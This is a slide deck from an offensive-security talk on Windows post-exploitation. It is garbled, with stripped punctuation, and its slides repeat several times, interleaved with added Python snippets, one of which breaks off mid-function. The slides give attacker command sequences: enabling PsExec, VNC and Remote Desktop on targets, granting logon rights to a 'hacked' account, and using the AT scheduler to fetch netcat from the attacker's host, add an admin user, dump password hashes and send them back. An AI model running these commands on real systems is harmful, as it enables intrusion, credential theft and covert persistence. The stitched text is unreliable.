– Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
• Different Perspective
– Know the target's environment better than they do
• If they don't use encryption, maybe you shouldn't either
• Change strategies to match the environment's normal behavior
– Don't always default to exploits
• See the Tactical Exploitation talk
• IDSs can't see normal behavior that is malicious
Slide 37
Stealth Evading Detection
• Using Windows security objects for stealth
– Auditing of Securable Objects is controlled by SACLs
– Null SACL = No Auditing = No Logs
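The defender's side of this slide is an inventory question: which objects can never produce an audit record because their SACL is null or holds no audit ACEs, whatever the audit policy says. The following is an added example, not the talk's code: it parses SDDL security-descriptor strings (the form tools such as PowerShell's Get-Acl export), isolates the S: component, and reports objects with no effective auditing. It treats a missing S: component and the NO_ACCESS_CONTROL marker as a null SACL, and counts only AU/OU/XU ACEs as auditing (integrity labels and other SACL metadata do not log). The paths and descriptors below are constructed for the example.

```python
"""Find securable objects that can never produce audit records because their
SACL is null or carries no audit ACEs (added example, not from the talk)."""
import re
from dataclasses import dataclass, field

# Only these SDDL ACE types generate audit events. ML (integrity label),
# RA (resource attribute), SP (scoped policy) and TL (trust label) also live
# in the SACL but are metadata, not auditing.
AUDIT_ACE_TYPES = {"AU", "OU", "XU"}
ACE_RE = re.compile(r"\(([^)]*)\)")
TAG_RE = re.compile(r"([OGDS]):")


@dataclass
class SaclReport:
    path: str
    sacl_present: bool                 # S: exists and is not NO_ACCESS_CONTROL
    audit_aces: list = field(default_factory=list)  # (type, flags, rights, sid)

    @property
    def audited(self) -> bool:
        return self.sacl_present and bool(self.audit_aces)


def split_sddl(sddl: str) -> dict:
    """Split an SDDL string into its O:, G:, D: and S: component bodies."""
    tags = list(TAG_RE.finditer(sddl))
    comps = {}
    for i, m in enumerate(tags):
        end = tags[i + 1].start() if i + 1 < len(tags) else len(sddl)
        comps[m.group(1)] = sddl[m.end():end]
    return comps


def parse_aces(component: str) -> list:
    """Return ACEs as (type, flags, rights, sid) from a D: or S: body."""
    aces = []
    for ace in ACE_RE.findall(component):
        fields = ace.split(";")
        fields += [""] * (6 - len(fields))  # type;flags;rights;obj_guid;inh_guid;sid
        aces.append((fields[0], fields[1], fields[2], fields[5]))
    return aces


def audit_report(path: str, sddl: str) -> SaclReport:
    """Classify one object's SACL: null, present-but-silent, or audited."""
    body = split_sddl(sddl).get("S")
    # No S: at all, or the explicit null-ACL marker, both mean a null SACL.
    if body is None or body.startswith("NO_ACCESS_CONTROL"):
        return SaclReport(path, False)
    audit = [a for a in parse_aces(body) if a[0] in AUDIT_ACE_TYPES]
    return SaclReport(path, True, audit)


def find_unaudited(entries) -> list:
    """entries: iterable of (path, sddl). Paths with no effective auditing."""
    return [path for path, sddl in entries if not audit_report(path, sddl).audited]


# Constructed sample (paths and descriptors invented for the example).
SAMPLE = [
    # Success and failure auditing of full access by Everyone: logs are produced.
    ("C:\\Finance\\payroll.xlsx",
     "O:BAG:SYD:(A;;FA;;;BA)(A;;FR;;;BU)S:(AU;SAFA;FA;;;WD)"),
    # SACL present but holds only an integrity label: nothing is audited.
    ("C:\\Tools\\agent.exe", "O:BAG:SYD:(A;;FA;;;BA)S:(ML;;NW;;;ME)"),
    # No S: component: null SACL.
    ("HKLM\\SOFTWARE\\Vendor\\Agent", "O:BAG:SYD:(A;;KA;;;BA)(A;;KR;;;BU)"),
    # Explicit null marker emitted by newer Windows versions.
    ("C:\\Windows\\Tasks\\At1.job", "O:SYG:SYD:(A;;FA;;;SY)S:NO_ACCESS_CONTROL"),
]

if __name__ == "__main__":
    for path in find_unaudited(SAMPLE):
        print("no auditing possible:", path)
```

Three of the four sample objects come back as unauditable; only the payroll file, whose SACL carries an AU ACE with both SA and FA flags, would ever log an access. The useful operational check is to run this over an export of the objects you expect to audit (task folders, sensitive shares, service and run keys) and treat a null SACL on any of them as a finding in its own right.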
Slide 38
• DEMOS
– Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
– Use the credentials / access of another user
• Goals
– Change your identity at will
• User ID, domain credentials, sessions
• Impersonate system accounts
• Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
– Target users
• Who has access to what?
• Where is the data?
– Change Identity
• Hijack credentials / sessions
• Abuse tokens
– Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
– Incognito (metasploit)
• Enumerate / hijack tokens
– FU / FUTO
• Enable SYSTEM privileges
• Change process privileges, DKOM
– SU, SUDO, KSU
– Process injection
– Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!
• What we want
– Privileges or SIDs
• What we get
– Access, Access, Access
• How we get it
– Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – flow
• Establish an authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
– net use \\target
– net time \\target
– at \\target (net time + 1 min) "tftp -i myip GET e.bat"
– at \\target (net time + 2 min) e.bat
– e.bat does:
• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)
• Gets hash-dumping tools and dumps hashes
• Sends hashes, identified by IP, back to the attacker host
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use / re-use
– Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – establish NetBIOS session credentials on a range of hosts
• MassWinenum – enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
– Beyond EIP – the theoretical tool development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
– Thanks to
• All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
• HD Moore, especially for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 38
• DEMOS
– Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
– Use the credentials / access of another user
• Goals
– Change your identity at will
• User ID, domain credentials, sessions
• Impersonate system accounts
• Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
– Target users
• Who has access to what
• Where is the data
– Change identity
• Hijack credentials / sessions
• Abuse tokens
– Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
– Incognito (Metasploit)
• Enumerate / hijack tokens
– FU / FUTo
• Enable SYSTEM privileges
• Change process privileges (DKOM)
– su, sudo, ksu
– Process injection
– Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!
• What we want
– Privileges or SIDs
• What we get
– Access, Access, Access
• How we get it
– Incognito vs FUTo
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
– Support all post-exploitation activities
– Disabling detection technologies
– Enabling insecure or easy-to-use access software
Slide 47
Feature Modification
• Feature modification is basically securable object manipulation
– Remember all those tokens and security descriptors
– These can be modified programmatically and directly
• Not just through existing tools
– Stealth / persistence requirements
• May make it more advantageous to use custom tools
– Access objects programmatically
– Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
– PsExec: it's still cool (thanks Mark)
• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
– Firewalls, AV, logging
• Modifying local security policies
Slide 49
Feature Modification
• Enabling psexec
– PsExec was a great, awesome remote shell / command tool
– Everybody now disables ClipBook, which psexec requires... l4m3
– Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the service control tool sc.exe
– net use \\target\ipc$ /user:username password
– sc \\target config netdde start= auto
– sc \\target config netddedsdm start= auto
– sc \\target config clipsrv start= auto
– sc \\target start netdde
– sc \\target start netddedsdm
– sc \\target start clipsrv
– The service names are NetDDE, NetDDEdsdm and ClipSrv; "start= auto" needs the space after the equals sign
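The `sc` sequence above is fire-and-forget: if ClipBook still is not running afterwards, nothing tells you, and `sc start` succeeding only means the start request was accepted. The Python below is an added example (not code from the talk) that generates the same command list for one host, in dependency order, and parses the output of `sc \\host query <service>` afterwards to report which of the three services is not RUNNING, telling a stopped service apart from one that does not exist on the target. The service names are the real ones; the host name and the sample `sc query` outputs are constructed.

```python
r"""Re-enable the ClipBook service chain psexec-style access needs and
verify that it is actually running.

Added example for this write-up, not code from the talk. Emits the `sc`
lines for one host and parses `sc \\host query <service>` output. Service
names are real; the host and sample outputs below are constructed.
"""
import re

# Dependency order: ClipSrv depends on NetDDE, which depends on NetDDEdsdm.
# The SCM starts dependencies itself, so the slide's order works too; this
# order just makes a failure easier to attribute to one service.
CLIPBOOK_SERVICES = ("netddedsdm", "netdde", "clipsrv")


def reenable_commands(host, services=CLIPBOOK_SERVICES):
    r"""The lines to run after `net use \\host\ipc$` has succeeded:
    set each service to auto-start, start it, then query it."""
    cmds = [f"sc \\\\{host} config {s} start= auto" for s in services]
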